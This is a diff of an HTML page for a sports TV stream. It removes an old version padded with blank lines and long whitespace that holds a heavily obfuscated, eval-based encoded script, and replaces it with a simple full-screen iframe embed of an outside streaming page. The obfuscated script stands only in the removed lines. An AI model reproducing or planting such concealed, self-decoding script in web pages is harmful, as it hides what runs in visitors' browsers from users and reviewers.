--- a/max/eurosport1fr.html
+++ b/max/eurosport1fr.html
@@ -1,128 +1,16 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-																																							<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var c6ca8b5=true;ll1=document.layers;lll=window.sidebar;c6ca8b5=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');c6ca8b5|=lII;zLP=location.protocol+'0FD';c225P8XdQR=new Array();gc41ccHFn8=new Array();gc41ccHFn8[0]='\166\105\172%4E%39NS\147V%6CF%33%38';c225P8XdQR[0]='<!doctype html><~\n~~head~script>eval(une~a~(\'v\\141r%20%71~-~6%37~:D~2~<2~<3B~-6~71~938~=%53t~52%69ng~2E~S6ro~S~>43~-50~-~/rC~SF~e4e~2~K31~:3~2~h~p~:~429~:Bf~b7~E~R28i~L3~4~C}3~u~R3}~z~;~{~b~q2B~2}~y~5}~6~8~q}}~=q~5}~K7~>~Cfu~SEc~E4~S~z6Fn~2~4~6y~:6~n~2~z7~D15~G4}9}~21d~~~S3um~e5}*~P2E~ko~e~s75men}-Mod~m2}C}C}F~})6D}Z~5}.}Q~S~G54~b}k}<}>4}.}1},165~b5}Z}P~Y77~1~T~P}z~n}!7}~@}<~>}%~{q}73}C~K}~C~Zu~b}96}V4i}H6~Y~3~51|~z}D}}=~82}	}~>2}Cs~2}}2~E0a}*}4s~~S~h|3|.~<6}v9s|7}q}m|A}*~~}[~.}N~A~:~Y}\n|7r}M|S|3}|~:~@|5~:~h2Fp|}N3|T|aF|2|/}|Z7|8}3|g|Z~Cz}	}D|O4}N|}4%~f}zaa}7|\'7after}t}N67}| ~?~t~?b~m66oreE|y}k~@|a{f}j{|~{Ed{2{~S|6|Pf{e{\ng}|{\'}}|L~T~r~={3}zw|}~/}za|~q|	}:~Ah}-}|l{\'{)68}M|9|D{J{~~d{|}~.{~Q~n~b~s|A~w~{~S}}\n~=|u{9}Q}q}M|y7th{`6}{p};}~5{7}}.|A~k~~}U~5}{}?}}{37}kE{1|P}j~-0{}}oem~S5nt~E~s4{+~6T{O7N{OD|X}D7A}	~s5}>~N~M|.{5{-}za~nj}}}6|L{c{x~H|+~:zl{i~e~}y}v~oBz+}z@}s~}}?|{[}?}}&z-}|`}{]z.|&{q|(z#}A|{e3}.z"~S|L5z&{sz}/z5~Mz#~Rz\\~X{}R}y~s|7~RzAdj~e}Azjz}-HT~-}?|~|a8zz`}\rzb}ze{(zzK3|&|~5|\ryy\n~{\'))</~~~~~~~~c}K}~.w~{("<tabl~wid{l=\'10~4\' b{}_ry/0\'~try=dy5gcol{y/#y2{y2y4~!ign = \'c}~{y<<{-z |<yy)yR\'y[t-family: V{dana, A~~!ytHelveticysy]yqs-s{if; ycxizeyl12pxxyDyFryl#Fxxxbackg~\\~$d-x{xyJ6yL>T~y]ouryV yD}_ of {lis pag~x@xB~\\{~eyAby <b~ycy]~y`y/x*x xFCCx/zwML Guardiyqyyc~/xRxPby?x1~ulyma{x>oyEx|xHoxJt yx4r xaxcx9eytixyxEsytJa~  ~(py)tw w~ yywlinkwkeep webx8oz}~xyi{rxAaw{wnyAmuch m{..wExP/xmxQy?<axUy_~y/{xyd}_yDrxziw0ylnw0exyEx+x[xx^yL~	{fy/~\ntp://wwp.|dww9{.yDmy4y&rxEty/_y(yqky<xqxSw0wy^xWybvyeygyiykymyoyqxyvxjlyyy{y}yxytsxxxx\nxvsxx xxw_xxwcx_0x x"x$x&w<x)w`xZyI0yKy;>wpw.PxIWxgewwomxlvxnxRyaxnt~yy>vOy\'y)>");dl=yyz.l{{s;oe=y+w<ov?o~wW?1:v0yp=(v^}Yv`vx}~}]}_||v{v`~!l)&&!vg;xEv]}evyt.w}Ey)uById;wsviw#~v?v%}_x!r?y>uxyflx;tN=yrvyOxz{.uxrAxEv`toLvl{Cax(vYxu-u,.uexOf~*~%wx~y>=0';qc6MIDfOOjlDvy='fu';mw5oT4q4eTW='BJUYtRkvOSOROOoBoPbwOpDRbbLqJTgO';qc6MIDfOOjlDvy+=    'nction y1L46f'+'j1DCS61bvq(q0464h2'+'nY5WHOD2FM5){';hnB5d9Grxo='eGrG174Mm7B9S7';trdZrcllD='\151%66%28z%4C\120%2Einde%78O%66%28%27%5C%35%35%27%29%3E%30%29%7Bc%32%32%35%50%38X%64Q%52%5B%30%5D%3D%27%78%27%7D%3Bv%61%72%20\154%32%3Dwi%6Ed\157%77%2Eoper%61%3F%31%3A%30%3Bfu\156\143tion%20\154%35%62%38a\143%36c%28%29%7B\151f%28c%36c\141%38%62%35%29%7B%64o\143u\155e\156%74%2Ew%72\151te%28l%4F%29%7D%7D%3B\146%75%6Ec\164i%6F\156%20l%33%28l%34%29%7B\154%35%3D%2Fz\141%2F\147%3B%6C%36%3D\123%74ring%2E%66%72%6Fm%43h\141rC%6Fde%28%30%29%3B%6C%34%3D%6C%34%2E\162eplace%28\154%35%2Cl%36%29%3B%76ar%20%6C%37%3D%6Ee%77%20\101%72ra%79%28%29%2Cl%38%3D%5F%31%3Dl%34%2Ele\156\147t\150%2C%6C%39%2C\154\111%2Cil%3D%31%36%32%35%36%2C%5F%31%3D%30%2CI%3D%30%2Cl\151%3D%27%27%3B\144o%7Bl%39%3Dl%34%2Echa\162%43%6F%64%65%41t%28%5F%31%29%3B%6C%49%3Dl';function j1DCS61bvqy1L46f(pAbpZzIM8T997z){mw5oT4q4eTW+=pAbpZzIM8T997z};eval(unescape('f%75nct%69o%6E%20%66\163i%33%39%20%20%20%20%28\171%36%38%35%38%33%31R%37o%44%36l%29%7B\166x%4Bf%30%34L%3Dy%36%38%35%38%33%31R%37o\104%36%6C%7D%3B'));gc41ccHFn8[0]+=    '%64%33E%59%31%36%35\157%56\115\121';c225P8XdQR[0]+=    'u$ru&:u(u*|uuyp;u]8v]a;~ wmsgy/\';}(n~wYyQ~%muC{{tx5yQu%e}uuvl.w]r~\\wySusu`OFuvkv?yFxyw0wrxI~yEuHw<uJuL~*fyiey!=-1uWuYu[w^i7whu]u!zt	t#u\'~!u*x	vwa){uuw0dwWg|<xgw~unupw0 uuuwuyxt1u|um~$tByQcIEuu(uhgvYtFryQt%u}tAttNcuut8tuovuJ~}Zu=tOE;xtTwex4ty#ct_)",~30)u}tuuCt[tLt]x8NS(et6t3v[vusuMvEwhxzah==2vssw@s3t6tSuitVy~tGtZ}u}s	ut7u\ryuQux{Ey}zs(s.yMOUSEDOWNvYtaw0wCu5xLvlntis}y{xs(yutbsAxupsFSu}s?tcw1wSvyth~%w Fsuqy#tWtYtIvX;t3vgt6t\\uq ~\\ss\rss/ubutu;sEst6~!{tsy4y;sc 0u}ru{sUs)v`s@x4xusE~\\szauosns9uuvju.t>uxus~tly~to}YtruNruC\',y1y2s s,uzuXtJt3us{rrs>rt9nsOtqy}y9r3vZr6sNrtqsuu.rrtM u0(t5uvs!tXtHu)tJsktCu1sorMr+s.w{w}r[xDz}YtnxvluvEr\\y~r^gr`vExxgw@~*^(INPUT|TEXTAREA|BrwTON|s8LECrxEMBs9|OBJqrxw	)$tt 1t|tKrslu2rWt3sssq{rtzas+x5{srs1s3v`s5s7qOVEvYq+vmr8rAwCy}=rIs$qrGu3q$syss=q)q;.{y)uAq/}~q1sr.q4s8s5q8q:uq<r9q?vhrcllqC s&t6qOq-s-q0s2qWqYEUP|q2uqps:s<q]tr@sBr\rqA2u~q{r\nsBsQqA3sHrQqguMxEt+ypt6sVr9q~rUrFrnuut3qOw}Sy{etMt6ufx>trpptMuCr[oSy>w#guCsguMuuIuKuM\'qw,uAdzxcuS1vuy)~V{l>4t{sKv_ss}^yt~%rw	y/.ultwXtqQo~trtntpr""nptwtyr)qCp_p.rSuripuMppGsMw0xy)~t>rt@s`tCtErNsdrQu}tmr rBtsp^pipatzt|u}nouexg qlsRt%vZmsEtapSt].hwgooop(u=w,~gqSp.dov]osub|<rvwop2t\'wny+2s>o#o"nro\'o)p,(0,o6t}_p3~*/yvYw8qbes]yvwWy~*~~oyiui{lo\'uHor&\'v>.aygobttvr[v,\'o^wCoawodtofo[wqoio`obodgaoZoroky~ouowogoyocoToVboXoZ~3|/o^n2nhoWwYoZo\\oyotwwfoxo_oznzacnognnn~nojnln o`oc~390nn\roYo~nol~~dxvvEy(ot=pwvFwynoqn.o{1.nn<v?noln@ovnn=n!nFnnInDn>ocn@onn$nv1x.n5n7n9wxnTotn0xLn3nYyFn[un]n-nKo{n	-~3~cncn6sn8nfvGs{-o*muU;vHoGva}Zg{lnz++spo?o-uMoG[m])>t!t6osRu{;xr~kqCr/mt6x?sva~pTo7oewhohy6su:vw$\'s%pkat+vgt+t\'fsjcy/<\'+\'xivwNy)="n8v%t]:y\'syEsuw^y){:t!y20v*u;wlmLy2v*y+y-h:x.v*~yO~\n:35v*z-p2:1">m7\'m6m8w#psux>~vh"stsvw0" yr}Ym>xqqmw~ lu&m>mww0Cw"x#ticduCm<mru0v%okoUyksd}_nmgmko/m:mhr>sLyy oUe(fcvYpgx8l\nuucw"py6xgdDxzawwqRrl1y&pYl\'tul"t6m|ql4xzakp.p}p\\suttyVuCtx}t{p|rlEozal;lI,lKlL;ywy<lXwy,y/lnWIy<p ppyDnwhv0p |7uk;|ubp*~~V.f~\\mChxgC}^l"13r\'o=l~kzal&{(inyi<~c8sgmmy7+=lou}l_nWm><"+"!--klkkkkmg";Ik';qc6MIDfOOjlDvy+=    'eva';m7TTZSlj6u4u9='FFRJZkWvOKkNchgJvOxVKOGdmkOdOOPEFOGC';qc6MIDfOOjlDvy+=    'l(unes';dMpEMQ='yQ758m70LwqDCj86I';qc6MIDfOOjlDvy+=    'cape(q0464h2nY5WHOD2FM5))}';eval(qc6MIDfOOjlDvy);ehCUd836BCq21Ks='VbTOOlvdpeQypOImOaMbOBNdLVcTrTGtEGuXEysoGPEcI';qc6MIDfOOjlDvy='';trdZrcllD+=    '%34%2Echa\162C\157%64%65\101t%28%2B%2B%5F%31%29%3Bl%37%5B\111%2B%2B%5D%3D\154%49%2Bil%2D%28l%39%3C%3C%37%29%7Dw%68%69%6C\145%28%5F%31%2B%2B%3Cl%38%29%3B\166\141r%20%6C%31%3D%6E%65\167%20A%72ray%28%29%2Cl%30%3D%6E\145\167%20Ar\162\141%79%28%29%2CIl%3D%31%32%38%3B%64\157%7B%6C%30%5B%49l%5D%3D%53\164ring%2E\146r%6FmC%68%61\162\103%6Fde%28\111l%29%7D\167%68i%6C\145%28%2D%2D%49l%29%3BI%6C%3D%31%32%38%3B\154%31%5B%30%5D%3Dl%69%3D\154%30%5Bl%37%5B%30%5D%5D%3Bl%6C%3D\154%37%5B%30%5D%3B%5Fl%3D%31%3Bva%72%20\154%5F%3D\154%37%2El%65n\147%74\150%2D%31%3Bw%68ile%28%5F\154%3C\154%5F%29%7B\163\167\151%74%63h%28l%37%5B%5Fl%5D%3C%49%6C%3F%31%3A%30%29%7B%63ase%20%30%20%3Al%30%5B\111%6C%5D%3D%6C%30%5Bl%6C%5D%2BS\164ri%6Eg%28%6C%30%5Bl%6C%5D%29%2E%73\165b\163t%72%28%30%2C%31%29%3Bl';j1DCS61bvqy1L46f('f5tQ9v4KDMe6YJ5');y3u7Vepu68Az='l';dMpEMQ+=    'pmlWqgrsCyvfF';c225P8XdQR[0]+=    '(v\\"/k$*k kkk.kk,k\'k(1kyk$yvW+InW~"qk=k?(o3ky/kk>1~"skmjyyk$yk&Ikk8kQyql\ry/xinqvbykw\\~%yY|dek<k!y$/kbxnskWnvW;lk)=kTnW+k1k=kk\'l_k*kknqyqkml_kTkk,k}xCklkSkJk7y$k$k~yQv	vh~+x@il~:lly<p6~sp9p;kjlqDsk(k(uukTl_u.oIyut{~*{nv{/egw#ox{{Bj2j4ogj/{.{dj5w5j>sk>koj)oJj,oM\'~n#og~~oZy6{ToxoZwgoZm:oZnvn;\'y&y(togl[jTnmntoZpsjk7jD~"vYsy+trpjit6xxv(:krIjFj+oL(|	,j~izal7iijiiivYmak;jt~2jwjjzoKj-~J,47ii}?i1r\'5,9i"ty2i i i\n{iiqS 3i1jys\\j{j-o=iiii#i9i$|/i\'}?i)mi,ju4i0i2j*ioMiiii\'~/i\'i#i#i=ii?mi*i\r}_yfxvtiEijHo<,o=iai`icibieqkoi1i]j|ku,j$vj$ikrikokTimkz,j imj	vYj\'~"tauuqUuzrkygl"jDI[2m[0]tyixk>h	7mumkw~v0t<hn}pBhu+k{nxjx[t]kyjEiy~uzhyhrlrskJh	h&vY~aLkqqdIhnhnv(jnyj<h7L;jh!h@xnyx<4;xh!t3m&MxzhwrvlkD,xy{i}rsh;[jhxhi1m	>hk4ms$qCqdkop.itIhsi1hui|nWrVjmlNr!lF\'ihjlr&r(lUl\'hqhx{p kv\\tawxD~&iziiow#w%,yi=gh={lixv\\kIh<pAh>gl_usy)ks\'itk7ta~~{h,u~*j\rjhqdk7g[kyih\'r/(ldlff&o3mry{g)o]ld}Zdlxyilhqn@xC{zNl|qPw)vbyVgKlgMk6g"qt|trpr1hog$t(qdt6g)ulv`g,xz{hzg1jg3j(gg7-qdg:uM!g<lew0g?g^{y>gDgFwgIgYgMg4wrvDgRgT{wx"efgfg\\gNy}g`hrWhopslhtrq^t~sEqcj!s?f#u.rdlpHyy!qbf*qOs{ptf)qd;ftCjgp tewWs_uo1CzzuUf7yQkIh{g	o\nf<af>c{(fBhfE hawp,l%fgC{r/qOu w-xgt6vEw#u6tzojfzw	hbl_[phl%pjuuvngjf,gm{RyqxEp\'fwftdwSxflFt<g0l%p/g<spFvEgP}~gS}_tfdj8j0(x6f,sm+eqMfaes|e{.eneltiw6tfqt3sRsy{vEfw<fee)uMe+se-fgQu,gTfcem"e ee#~%wSSjw"~Vofxzrpxuut6qCl\'kI~"jt6y9hW{lqPyq~uts>jzl7l<uh}l<ehBe{o=lqp,ltlvlxlzl|(eWhYfyFkr*25+}zfsI~eg=erlteuo*ewd*g)m8ulokovfdd=oeeee6d\rdddrzapyx;e~~x<w+f!~dquLx@{pMt\'x\'m"w#xLyq*d$ld\'d)}Z{~*yFjOimj$,t%t|e~p\n(d tqx=tad%d6|<d8rd,d.t~%j?pr?dIsrd(dKpMd:pWj?d=k(d?tIdAp	t3dEd"f1svx"hqudNtdPd1qid$dgw@qu~*w0d;d\\j$IqeQkJjlgEi1k7v0s[wu1u;ru4u6u8yu;ou?o uDuMf]y,f_rghdseqjovGr1ji=peqOvn{rLc4edHqdujit=4ck>qMeuo@tp4vyf~p=c/k7ct3gfceu~#c4oB\'i~y1c:c;qMrdr+ ji}lWyyxPl[>gjDuufgEhqfusMhzah-zuud:l`gtle8e\rfzoy}fhqueIjpf{teOcRkOy~lZxV~}Yxiam>|dw#tmgjQxOt7x@fk^w]cyjy=oUvVAA s5BIq\n TVvRbkccVc~mp~m>wRt/cskj>y5pJh"xgj3nvsf6x	wW}Y{xClp,b3y6xh{b3m@oUuqmCo(mF{u~mVmey2%;m[gm]r(bLbc~b,yjNvQb~b5hy]x6m>wjpswm/xyxnq{r7e/ex5obgpt1luwrhpl/b[}YvKpJxnjK>';trdZrcllD+=    '%31%5B%5Fl%5D%3D%6C%30%5B%49l%5D%3B\151\146%28l%32%29%7Bl\151%2B%3D%6C%30%5B\111\154%5D%7D%3Bbr\145%61k%3B%64%65\146a\165lt%3Al%31%5B%5F%6C%5D%3D\154%30%5Bl%37%5B%5Fl%5D%5D%3B\151%66%28l%32%29%7B%6Ci%2B%3D%6C%30%5Bl%37%5B%5F%6C%5D%5D%7D%3B%6C%30%5BI%6C%5D%3Dl%30%5Bl%6C%5D%2B%53t%72in\147%28l%30%5B%6C%37%5B%5F\154%5D%5D%29%2E%73\165bst\162%28%30%2C%31%29%3B\142r%65a\153%7D%3B\111%6C%2B%2B%3B%6C%6C%3D\154%37%5B%5F%6C%5D%3B%5Fl%2B%2B%7D%3B\151\146%28%21%6C%32%29%7B\162\145t\165r%6E%28l%31%2E\152oi%6E%28%27%27%29%29%7D\145l\163e%7B%72e\164%75\162\156%20li%7D%7D%3Bv\141r%20%6CO%3D%27%27%3Bf%6Fr%28\151i%3D%30%3B%69i%3Cc%32%32%35P%38Xd\121\122%2Ele\156%67th%3Bi\151%2B%2B%29%7Bl\117%2B%3D%6C%33%28\143%32%32%35P%38%58\144%51R%5B\151\151%5D%29%7D%3B%6C%35\142%38ac%36c%28%29%3B';</script><!--iZmQcx1hc6Sgz8M18I--><script>ehCUd836BCq21Ks      ='MXWeYrrmOeFneeniDSPExfGOOWekEcKoyOpOOKOXOUrfVOLDOcfIsObWSvOOgvc';dvSEpWOcE4CP='s7utuRxv231yIEH';j1DCS61bvqy1L46f    (m7TTZSlj6u4u9);y1L46fj1DCS61bvq  (trdZrcllD);k4VXYr834g9ID86='hJRVJZe8iwEP4kaq99huK41T';eval(unescape('%71%79%36%28%27%39%65%62%64%63%27%29%3B'));y3u7Vepu68Az+=    'rhLOLghqbuiftFOYlROFixLGeOBwZPXppKdcaEuylcJDcSOpLyXXgMDyhHdZwfPxLkyFMtBkXILrPuqEXdnOawOKGxqTbBOJiEXnXVOOPNrCKEtOKohReXMFdikObOklKnpfYcy';</script><script>qwI3VxckX='wKi6qxX45s4Sghb';</script></head><body></body></html>
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
+<!doctype html>
+<html>
+
+<head>
+<title>AA MOBILE TV</title>
+<style type="text/css">
+body {margin:0;}
+iframe {padding:0;border:0;position:absolute;width:100%;height:100%;}
+</style>
+</head>
+
+<body>
+<iframe src="https://maxsport.one/eurosport1fr.php"></iframe>
+</body>
+
+</html>
